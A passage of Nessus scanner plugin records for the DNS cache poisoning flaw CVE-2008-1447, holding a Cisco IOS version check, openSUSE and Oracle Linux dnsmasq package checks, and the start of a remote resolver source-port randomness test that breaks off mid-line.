'12.2(13)ZF1') flag++;\nelse if (version == '12.2(13)ZF') flag++;\nelse if (version == '12.2(13)ZE') flag++;\nelse if (version == '12.2(13)ZD4') flag++;\nelse if (version == '12.2(13)ZD3') flag++;\nelse if (version == '12.2(13)ZD2') flag++;\nelse if (version == '12.2(13)ZD1') flag++;\nelse if (version == '12.2(13)ZD') flag++;\nelse if (version == '12.2(8)ZB8') flag++;\nelse if (version == '12.2(8)ZB7') flag++;\nelse if (version == '12.2(8)ZB6') flag++;\nelse if (version == '12.2(8)ZB5') flag++;\nelse if (version == '12.2(8)ZB4') flag++;\nelse if (version == '12.2(8)ZB3') flag++;\nelse if (version == '12.2(8)ZB2') flag++;\nelse if (version == '12.2(8)ZB1') flag++;\nelse if (version == '12.2(8)ZB') flag++;\nelse if (version == '12.2(11)YV1') flag++;\nelse if (version == '12.2(11)YV') flag++;\nelse if (version == '12.2(11)YU') flag++;\nelse if (version == '12.2(11)YT2') flag++;\nelse if (version == '12.2(11)YT1') flag++;\nelse if (version == '12.2(11)YT') flag++;\nelse if (version == '12.2(8)YN1') flag++;\nelse if (version == '12.2(8)YN') flag++;\nelse if (version == '12.2(8)YM') flag++;\nelse if (version == '12.2(8)YL') flag++;\nelse if (version == '12.2(8)YJ1') flag++;\nelse if (version == '12.2(8)YJ') flag++;\nelse if (version == '12.2(2)XU') flag++;\nelse if (version == '12.2(2)XT3') flag++;\nelse if (version == '12.2(2)XT2') flag++;\nelse if (version == '12.2(2)XT') flag++;\nelse if (version == '12.2(4)XL6') flag++;\nelse if (version == '12.2(4)XL5') flag++;\nelse if (version == '12.2(4)XL4') flag++;\nelse if (version == '12.2(4)XL3') flag++;\nelse if (version == '12.2(4)XL') flag++;\nelse if (version == '12.2(2)XK3') flag++;\nelse if (version == '12.2(2)XK2') flag++;\nelse if (version == '12.2(2)XK') flag++;\nelse if (version == '12.2(2)XG1') flag++;\nelse if (version == '12.2(2)XG') flag++;\nelse if (version == '12.2(2)XC2') flag++;\nelse if (version == '12.2(2)XC1') flag++;\nelse if (version == '12.2(2)XC') flag++;\nelse if (version == '12.2(2)XB8') 
flag++;\nelse if (version == '12.2(2)XB7') flag++;\nelse if (version == '12.2(2)XB6') flag++;\nelse if (version == '12.2(2)XB5') flag++;\nelse if (version == '12.2(2)XB3') flag++;\nelse if (version == '12.2(2)XB2') flag++;\nelse if (version == '12.2(2)XB15') flag++;\nelse if (version == '12.2(2)XB14') flag++;\nelse if (version == '12.2(2)XB11') flag++;\nelse if (version == '12.2(8)TPC10c') flag++;\nelse if (version == '12.2(8)TPC10b') flag++;\nelse if (version == '12.2(15)T9') flag++;\nelse if (version == '12.2(15)T8') flag++;\nelse if (version == '12.2(15)T7') flag++;\nelse if (version == '12.2(15)T5') flag++;\nelse if (version == '12.2(15)T4') flag++;\nelse if (version == '12.2(15)T2') flag++;\nelse if (version == '12.2(15)T16') flag++;\nelse if (version == '12.2(15)T15') flag++;\nelse if (version == '12.2(15)T14') flag++;\nelse if (version == '12.2(15)T13') flag++;\nelse if (version == '12.2(15)T12') flag++;\nelse if (version == '12.2(15)T11') flag++;\nelse if (version == '12.2(15)T10') flag++;\nelse if (version == '12.2(15)T1') flag++;\nelse if (version == '12.2(15)T') flag++;\nelse if (version == '12.2(13)T9') flag++;\nelse if (version == '12.2(13)T8') flag++;\nelse if (version == '12.2(13)T5') flag++;\nelse if (version == '12.2(13)T4') flag++;\nelse if (version == '12.2(13)T3') flag++;\nelse if (version == '12.2(13)T2') flag++;\nelse if (version == '12.2(13)T16') flag++;\nelse if (version == '12.2(13)T14') flag++;\nelse if (version == '12.2(13)T13') flag++;\nelse if (version == '12.2(13)T12') flag++;\nelse if (version == '12.2(13)T11') flag++;\nelse if (version == '12.2(13)T10') flag++;\nelse if (version == '12.2(13)T1a') flag++;\nelse if (version == '12.2(13)T1') flag++;\nelse if (version == '12.2(13)T') flag++;\nelse if (version == '12.2(11)T9') flag++;\nelse if (version == '12.2(11)T8') flag++;\nelse if (version == '12.2(11)T6') flag++;\nelse if (version == '12.2(11)T5') flag++;\nelse if (version == '12.2(11)T3') flag++;\nelse if (version == '12.2(11)T2') 
flag++;\nelse if (version == '12.2(11)T11') flag++;\nelse if (version == '12.2(11)T10') flag++;\nelse if (version == '12.2(11)T1') flag++;\nelse if (version == '12.2(11)T') flag++;\nelse if (version == '12.2(8)T8') flag++;\nelse if (version == '12.2(8)T5') flag++;\nelse if (version == '12.2(8)T4') flag++;\nelse if (version == '12.2(8)T3') flag++;\nelse if (version == '12.2(8)T2') flag++;\nelse if (version == '12.2(8)T10') flag++;\nelse if (version == '12.2(8)T1') flag++;\nelse if (version == '12.2(8)T') flag++;\nelse if (version == '12.2(4)T7') flag++;\nelse if (version == '12.2(4)T6') flag++;\nelse if (version == '12.2(4)T5') flag++;\nelse if (version == '12.2(4)T3') flag++;\nelse if (version == '12.2(4)T2') flag++;\nelse if (version == '12.2(4)T1') flag++;\nelse if (version == '12.2(4)T') flag++;\nelse if (version == '12.2(2)T4') flag++;\nelse if (version == '12.2(2)T1') flag++;\nelse if (version == '12.2(2)T') flag++;\nelse if (version == '12.2(12h)M1') flag++;\nelse if (version == '12.2(12b)M1') flag++;\nelse if (version == '12.2(15)CZ3') flag++;\nelse if (version == '12.2(15)CZ2') flag++;\nelse if (version == '12.2(15)CZ1') flag++;\nelse if (version == '12.2(15)CZ') flag++;\nelse if (version == '12.2(4)BW2') flag++;\nelse if (version == '12.2(4)BW1a') flag++;\nelse if (version == '12.2(4)BW1') flag++;\nelse if (version == '12.2(4)BW') flag++;\nelse if (version == '12.2(16)B2') flag++;\nelse if (version == '12.2(16)B1') flag++;\nelse if (version == '12.2(16)B') flag++;\nelse if (version == '12.2(15)B') flag++;\nelse if (version == '12.2(4)B8') flag++;\nelse if (version == '12.2(4)B7') flag++;\nelse if (version == '12.2(4)B6') flag++;\nelse if (version == '12.2(4)B5') flag++;\nelse if (version == '12.2(4)B4') flag++;\nelse if (version == '12.2(4)B3') flag++;\nelse if (version == '12.2(4)B2') flag++;\nelse if (version == '12.2(4)B1') flag++;\nelse if (version == '12.2(4)B') flag++;\nelse if (version == '12.2(46a)') flag++;\nelse if (version == '12.2(46)') 
flag++;\nelse if (version == '12.2(40a)') flag++;\nelse if (version == '12.2(40)') flag++;\nelse if (version == '12.2(37)') flag++;\nelse if (version == '12.2(34a)') flag++;\nelse if (version == '12.2(34)') flag++;\nelse if (version == '12.2(32)') flag++;\nelse if (version == '12.2(31)') flag++;\nelse if (version == '12.2(29b)') flag++;\nelse if (version == '12.2(29a)') flag++;\nelse if (version == '12.2(29)') flag++;\nelse if (version == '12.2(28d)') flag++;\nelse if (version == '12.2(28c)') flag++;\nelse if (version == '12.2(28b)') flag++;\nelse if (version == '12.2(28a)') flag++;\nelse if (version == '12.2(28)') flag++;\nelse if (version == '12.2(27c)') flag++;\nelse if (version == '12.2(27b)') flag++;\nelse if (version == '12.2(27a)') flag++;\nelse if (version == '12.2(27)') flag++;\nelse if (version == '12.2(26c)') flag++;\nelse if (version == '12.2(26b)') flag++;\nelse if (version == '12.2(26a)') flag++;\nelse if (version == '12.2(26)') flag++;\nelse if (version == '12.2(24b)') flag++;\nelse if (version == '12.2(24a)') flag++;\nelse if (version == '12.2(24)') flag++;\nelse if (version == '12.2(23f)') flag++;\nelse if (version == '12.2(23e)') flag++;\nelse if (version == '12.2(23d)') flag++;\nelse if (version == '12.2(23c)') flag++;\nelse if (version == '12.2(23a)') flag++;\nelse if (version == '12.2(23)') flag++;\nelse if (version == '12.2(21b)') flag++;\nelse if (version == '12.2(21a)') flag++;\nelse if (version == '12.2(21)') flag++;\nelse if (version == '12.2(19c)') flag++;\nelse if (version == '12.2(19b)') flag++;\nelse if (version == '12.2(19a)') flag++;\nelse if (version == '12.2(19)') flag++;\nelse if (version == '12.2(17f)') flag++;\nelse if (version == '12.2(17e)') flag++;\nelse if (version == '12.2(17d)') flag++;\nelse if (version == '12.2(17b)') flag++;\nelse if (version == '12.2(17a)') flag++;\nelse if (version == '12.2(17)') flag++;\nelse if (version == '12.2(16f)') flag++;\nelse if (version == '12.2(16c)') flag++;\nelse if (version == 
'12.2(16b)') flag++;\nelse if (version == '12.2(16a)') flag++;\nelse if (version == '12.2(16)') flag++;\nelse if (version == '12.2(13e)') flag++;\nelse if (version == '12.2(13c)') flag++;\nelse if (version == '12.2(13b)') flag++;\nelse if (version == '12.2(13a)') flag++;\nelse if (version == '12.2(13)') flag++;\nelse if (version == '12.2(12m)') flag++;\nelse if (version == '12.2(12l)') flag++;\nelse if (version == '12.2(12k)') flag++;\nelse if (version == '12.2(12j)') flag++;\nelse if (version == '12.2(12i)') flag++;\nelse if (version == '12.2(12h)') flag++;\nelse if (version == '12.2(12g)') flag++;\nelse if (version == '12.2(12f)') flag++;\nelse if (version == '12.2(12e)') flag++;\nelse if (version == '12.2(12c)') flag++;\nelse if (version == '12.2(12b)') flag++;\nelse if (version == '12.2(12a)') flag++;\nelse if (version == '12.2(12)') flag++;\nelse if (version == '12.2(10g)') flag++;\nelse if (version == '12.2(10d)') flag++;\nelse if (version == '12.2(10b)') flag++;\nelse if (version == '12.2(10a)') flag++;\nelse if (version == '12.2(10)') flag++;\nelse if (version == '12.2(7g)') flag++;\nelse if (version == '12.2(7c)') flag++;\nelse if (version == '12.2(7b)') flag++;\nelse if (version == '12.2(7a)') flag++;\nelse if (version == '12.2(7)') flag++;\nelse if (version == '12.2(6j)') flag++;\nelse if (version == '12.2(6i)') flag++;\nelse if (version == '12.2(6h)') flag++;\nelse if (version == '12.2(6g)') flag++;\nelse if (version == '12.2(6f)') flag++;\nelse if (version == '12.2(6e)') flag++;\nelse if (version == '12.2(6d)') flag++;\nelse if (version == '12.2(6c)') flag++;\nelse if (version == '12.2(6b)') flag++;\nelse if (version == '12.2(6a)') flag++;\nelse if (version == '12.2(6)') flag++;\nelse if (version == '12.2(5d)') flag++;\nelse if (version == '12.2(5a)') flag++;\nelse if (version == '12.2(5)') flag++;\nelse if (version == '12.2(3g)') flag++;\nelse if (version == '12.2(3d)') flag++;\nelse if (version == '12.2(3b)') flag++;\nelse if (version == '12.2(3)') 
flag++;\nelse if (version == '12.2(1d)') flag++;\nelse if (version == '12.2(1c)') flag++;\nelse if (version == '12.2(1b)') flag++;\nelse if (version == '12.2(1a)') flag++;\nelse if (version == '12.2(1)') flag++;\nelse if (version == '12.1(5)T9') flag++;\nelse if (version == '12.1(5)T8') flag++;\nelse if (version == '12.1(5)T7') flag++;\nelse if (version == '12.1(5)T6') flag++;\nelse if (version == '12.1(5)T5') flag++;\nelse if (version == '12.1(5)T4') flag++;\nelse if (version == '12.1(5)T20') flag++;\nelse if (version == '12.1(5)T2') flag++;\nelse if (version == '12.1(5)T19') flag++;\nelse if (version == '12.1(5)T18') flag++;\nelse if (version == '12.1(5)T17') flag++;\nelse if (version == '12.1(5)T15') flag++;\nelse if (version == '12.1(5)T12') flag++;\nelse if (version == '12.1(5)T10') flag++;\nelse if (version == '12.1(5)T') flag++;\nelse if (version == '12.1(3)T') flag++;\nelse if (version == '12.1(2)T') flag++;\nelse if (version == '12.1(1)T') flag++;\nelse if (version == '12.1(27b)') flag++;\nelse if (version == '12.1(27a)') flag++;\nelse if (version == '12.1(27)') flag++;\nelse if (version == '12.1(26)') flag++;\nelse if (version == '12.1(25)') flag++;\nelse if (version == '12.1(24)') flag++;\nelse if (version == '12.1(22c)') flag++;\nelse if (version == '12.1(22b)') flag++;\nelse if (version == '12.1(22a)') flag++;\nelse if (version == '12.1(22)') flag++;\nelse if (version == '12.1(21)') flag++;\nelse if (version == '12.1(20a)') flag++;\nelse if (version == '12.1(20)') flag++;\nelse if (version == '12.1(19)') flag++;\nelse if (version == '12.1(18)') flag++;\nelse if (version == '12.1(17a)') flag++;\nelse if (version == '12.1(17)') flag++;\nelse if (version == '12.1(16)') flag++;\nelse if (version == '12.1(15)') flag++;\nelse if (version == '12.1(14)') flag++;\nelse if (version == '12.1(13a)') flag++;\nelse if (version == '12.1(13)') flag++;\nelse if (version == '12.1(12b)') flag++;\nelse if (version == '12.1(12a)') flag++;\nelse if (version == '12.1(12)') 
flag++;\nelse if (version == '12.1(11b)') flag++;\nelse if (version == '12.1(11)') flag++;\nelse if (version == '12.1(10a)') flag++;\nelse if (version == '12.1(10)') flag++;\nelse if (version == '12.1(9a)') flag++;\nelse if (version == '12.1(9)') flag++;\nelse if (version == '12.1(8a)') flag++;\nelse if (version == '12.1(8)') flag++;\nelse if (version == '12.1(7c)') flag++;\nelse if (version == '12.1(7b)') flag++;\nelse if (version == '12.1(7)') flag++;\nelse if (version == '12.1(6b)') flag++;\nelse if (version == '12.1(6a)') flag++;\nelse if (version == '12.1(6)') flag++;\nelse if (version == '12.1(5e)') flag++;\nelse if (version == '12.1(5c)') flag++;\nelse if (version == '12.1(5b)') flag++;\nelse if (version == '12.1(5a)') flag++;\nelse if (version == '12.1(5)') flag++;\nelse if (version == '12.1(4c)') flag++;\nelse if (version == '12.1(4b)') flag++;\nelse if (version == '12.1(4a)') flag++;\nelse if (version == '12.1(3b)') flag++;\nelse if (version == '12.1(3)') flag++;\nelse if (version == '12.1(2b)') flag++;\nelse if (version == '12.1(2)') flag++;\nelse if (version == '12.1(1c)') flag++;\nelse if (version == '12.1(1)') flag++;\nelse if (version == '12.0(7)XK1') flag++;\nelse if (version == '12.0(7)XK') flag++;\nelse if (version == '12.0(7)T3') flag++;\nelse if (version == '12.0(7)T2') flag++;\nelse if (version == '12.0(7)T') flag++;\nelse if (version == '12.0(5)T') flag++;\nelse if (version == '12.0(4)T') flag++;\nelse if (version == '12.0(3)T2') flag++;\nelse if (version == '12.0(3)T') flag++;\n\nif (get_kb_item(\"Host/local_checks_enabled\"))\n{\n if (flag)\n {\n flag = 0;\n buf = cisco_command_kb_item(\"Host/Cisco/Config/show_running-config\", \"show running-config\");\n if (check_cisco_result(buf))\n {\n if (preg(pattern:\"ip dns server\", multiline:TRUE, string:buf)) { flag = 1; }\n } else if (cisco_needs_enable(buf)) { flag = 1; override = 1; }\n }\n}\n\nif (flag)\n{\n security_warning(port:0, extra:cisco_caveat(override));\n exit(0);\n}\nelse 
audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:43:31", "description": "This update of dnsmasq uses random UDP source ports and a random TRXID\nnow. (CVE-2008-1447)", "edition": 23, "published": "2008-08-15T00:00:00", "title": "openSUSE 10 Security Update : dnsmasq (dnsmasq-5512)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2008-08-15T00:00:00", "cpe": ["cpe:/o:novell:opensuse:10.3", "cpe:/o:novell:opensuse:10.2", "p-cpe:/a:novell:opensuse:dnsmasq"], "id": "SUSE_DNSMASQ-5512.NASL", "href": "https://www.tenable.com/plugins/nessus/33895", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update dnsmasq-5512.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33895);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"openSUSE 10 Security Update : dnsmasq (dnsmasq-5512)\");\n script_summary(english:\"Check for the dnsmasq-5512 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of dnsmasq uses random UDP source ports and a random TRXID\nnow. 
(CVE-2008-1447)\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dnsmasq package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dnsmasq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/15\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.2|SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.2 / 10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.2\", reference:\"dnsmasq-2.45-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", 
reference:\"dnsmasq-2.45-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dnsmasq\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-17T12:44:13", "description": "From Red Hat Security Advisory 2008:0789 :\n\nAn updated dnsmasq package that implements UDP source-port\nrandomization is now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nDnsmasq is lightweight DNS forwarder and DHCP server. It is designed\nto provide DNS and, optionally, DHCP, to a small network.\n\nThe dnsmasq DNS resolver used a fixed source UDP port. This could have\nmade DNS spoofing attacks easier. dnsmasq has been updated to use\nrandom UDP source ports, helping to make DNS spoofing attacks harder.\n(CVE-2008-1447)\n\nAll dnsmasq users are advised to upgrade to this updated package, that\nupgrades dnsmasq to version 2.45, which resolves this issue.", "edition": 24, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 : dnsmasq (ELSA-2008-0789)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:dnsmasq", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2008-0789.NASL", "href": "https://www.tenable.com/plugins/nessus/67735", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2008:0789 and \n# Oracle Linux Security Advisory ELSA-2008-0789 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67735);\n 
script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_xref(name:\"RHSA\", value:\"2008:0789\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"Oracle Linux 5 : dnsmasq (ELSA-2008-0789)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2008:0789 :\n\nAn updated dnsmasq package that implements UDP source-port\nrandomization is now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nDnsmasq is lightweight DNS forwarder and DHCP server. It is designed\nto provide DNS and, optionally, DHCP, to a small network.\n\nThe dnsmasq DNS resolver used a fixed source UDP port. This could have\nmade DNS spoofing attacks easier. 
dnsmasq has been updated to use\nrandom UDP source ports, helping to make DNS spoofing attacks harder.\n(CVE-2008-1447)\n\nAll dnsmasq users are advised to upgrade to this updated package, that\nupgrades dnsmasq to version 2.45, which resolves this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-August/000706.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dnsmasq package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dnsmasq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"dnsmasq-2.45-1.el5_2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dnsmasq\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-02-01T02:03:27", "description": "The remote DNS resolver does not use random ports when making queries\nto third-party DNS servers. 
An unauthenticated, remote attacker can\nexploit this to poison the remote DNS server, allowing the attacker to\ndivert legitimate traffic to arbitrary sites.", "edition": 28, "cvss3": {"score": 9.1, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"}, "published": "2008-07-09T00:00:00", "title": "Multiple Vendor DNS Query ID Field Prediction Cache Poisoning", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2021-02-02T00:00:00", "cpe": [], "id": "DNS_NON_RANDOM_SOURCE_PORTS.NASL", "href": "https://www.tenable.com/plugins/nessus/33447", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(33447);\n script_version (\"1.34\");\n script_cvs_date(\"Date: 2018/11/15 20:50:21\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_xref(name:\"CERT\", value:\"800113\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n script_xref(name:\"EDB-ID\", value:\"6122\");\n script_xref(name:\"EDB-ID\", value:\"6123\");\n script_xref(name:\"EDB-ID\", value:\"6130\");\n\n script_name(english:\"Multiple Vendor DNS Query ID Field Prediction Cache Poisoning\");\n script_summary(english:\"Determines if the remote DNS server uses random source ports when making queries.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote name resolver (or the server it uses upstream) is affected\nby a DNS cache poisoning vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote DNS resolver does not use random ports when making queries\nto third-party DNS servers. 
An unauthenticated, remote attacker can\nexploit this to poison the remote DNS server, allowing the attacker to\ndivert legitimate traffic to arbitrary sites.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.cnet.com/news/massive-coordinated-dns-patch-released/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.theregister.co.uk/2008/07/21/dns_flaw_speculation/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact your DNS server vendor for a patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/09\");\n \n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english: \"DNS\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n \n script_dependencie(\"bind_query.nasl\");\n script_require_keys(\"DNS/recursive_queries\");\n exit(0);\n }\n\ninclude(\"global_settings.inc\");\ninclude(\"audit.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"dns_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"spad_log_func.inc\");\n\nport = 53;\nif (! 
get_udp_port_state(port)) exit(0, \"UDP port \"+port+\" is not open.\");\n\nMIN_SAMPLES = 4;\nNUM = 4;\nHARD_LIMIT = 50;\n\nfunction abs()\n{\n local_var x;\n x = _FCT_ANON_ARGS[0];\n if ( x > 0 ) return x;\n return 0 - x;\n}\n\ntotCount = 0;\nper_ip = make_array();\n\nfor ( i = 0 ; i < NUM ; i ++ )\n{\n totCount ++;\n req[\"transaction_id\"] = rand() % 65535;\n req[\"flags\"] = 0x0100;\n req[\"q\"] = 1;\n packet = mkdns(dns:req, query:mk_query(txt:dns_str_to_query_txt(rand_str(length:8, charset:\"abcdefghijklmnopqrstuvwxyz\") + \"-\" + i + \".t.nessus.org.\"), type:0x0010, class:0x0001));\n soc = open_sock_udp(53);\n send(socket:soc, data:packet);\n r = recv(socket:soc, length:4096);\n close(soc);\n if ( ! r )\n exit(1, \"Failed to receive DNS response from socket.\");\n\n r = dns_split(r);\n res = r[\"an_rr_data_0_data\"];\n if ( ! res )\n exit(1, \"DNS result not received.\");\n\n if( strlen(res) < 2 )\n exit(1, \"DNS result length < 2.\");\n\n res = substr(res, 1, strlen(res) - 1);\n if ( res !~ \"^[0-9.]+,[0-9]+\")\n exit(1, \"DNS results don't conform to IP address regex.\");\n\n array = split(res, sep:\",\", keep:FALSE);\n responses_ports = per_ip[array[0]];\n if ( 